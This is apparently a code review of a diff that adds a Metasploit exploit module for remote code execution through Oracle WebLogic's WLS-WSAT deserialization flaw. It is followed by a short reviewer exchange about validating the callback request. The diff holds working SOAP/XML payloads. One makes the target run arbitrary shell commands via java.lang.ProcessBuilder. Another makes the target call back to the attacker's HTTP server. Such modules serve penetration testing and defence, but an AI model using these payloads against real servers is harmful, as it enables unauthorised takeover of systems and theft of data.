modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb

```diff
@@ -0,0 +1,193 @@
+        # just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
+      OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
+      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
+      OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
+    ])
+  end
+
+  def cmd_base
+    if target['Platform'] == 'win'
+      return 'cmd'
+    else
+      return '/bin/sh'
+    end
+  end
+
+  def cmd_opt
+    if target['Platform'] == 'win'
+      return '/c'
+    else
+      return '-c'
+    end
+  end
+
+
+  #
+  # This generates a XML payload that will execute the desired payload on the RHOST
+  #
+  def exploit_process_builder_payload
+    # Generate a payload which will execute on a *nix machine using /bin/sh
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java>
+        <object class="java.lang.ProcessBuilder">
+          <array class="java.lang.String" length="3" >
+            <void index="0">
+              <string>#{cmd_base}</string>
+            </void>
+            <void index="1">
+              <string>#{cmd_opt}</string>
+            </void>
+            <void index="2">
+              <string>#{payload.encoded.encode(xml: :text)}</string>
+            </void>
+          </array>
+          <void method="start"/>
+        </object>
+      </java>
+    </work:WorkContext>
+  </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  #
+  # This builds a XML payload that will generate a HTTP GET request to our SRVHOST
+  # from the target machine.
+  #
+  def check_process_builder_payload
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java version="1.8" class="java.beans.XMLDecoder">
+        <object id="url" class="java.net.URL">
+          <string>#{get_uri.encode(xml: :text)}</string>
+        </object>
+        <object idref="url">
+          <void id="stream" method = "openStream" />
+        </object>
+      </java>
+    </work:WorkContext>
+    </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  #
+  # In the event that a 'check' host responds, we should respond randomly so that we don't clog up
+  # the logs too much with a no response error or similar.
+  #
+  def on_request_uri(cli, request)
+    random_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>'
+    send_response(cli, random_content)
+
+    @received_request = true
```

Comment:
Maybe you can check that the request matches known values. Is there a user agent you can compare against? If your resource is random (the default), that should mitigate passersby, too.

Reply:
Not sure about this one -- the User-Agent may not be stable.  In my environment, the Windows User-Agent is: `Java1.6.0_29` and Ubuntu's User-Agent is `Java1.6.0_45`.

Reply:
I don't have enough examples to know if it'd be possible to check. The only idea I'd have would be maybe

```
if request.headers['User-Agent'] =~ /Java.*/
```

But I don't know for sure how stable that is

Reply:
Let's not bother. A "secret" resource is enough. `on_request_uri` shouldn't be triggered unless the client knows the resource.